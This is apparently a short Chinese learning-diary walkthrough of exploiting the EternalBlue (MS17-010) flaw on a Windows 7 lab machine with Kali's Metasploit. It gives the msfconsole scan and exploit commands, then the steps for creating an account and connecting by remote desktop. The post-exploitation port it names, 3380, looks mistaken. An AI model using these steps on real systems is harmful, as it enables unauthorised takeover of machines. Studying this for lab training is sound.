使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统（9.27 第十三天）

1、开启postgresql数据库

 

 

 

2、msfconsole 进入MSF中

3、search 17-010 搜索cve17-010相关的exp

auxiliary/scanner/smb/smb_ms17_010    扫描漏洞是否存在

exploit/windows/smb/ms17_010_eternalblue  用来攻击的exp

 

 

 

4、探测漏洞是否存在

use auxiliary/scanner/smb/smb_ms17_010

 

 

 

5、set rhosts 192.168.121.146   指定需要设置的主机

 exploit    设置完成之后运行

 

 

 

6、实施攻击

use exploit/windows/smb/ms17_010_eternalblue   进去攻击模块

    set rhosts 192.168.121.146   指定攻击ip

    exploit    运行

 

 

 

 

 

 

7、到这里我们就攻击成功了，直接得到目标的system权限

8、然后创建账户--打开3380端口--rdesktop 靶机的IP  使用远程桌面连接靶机--连接完成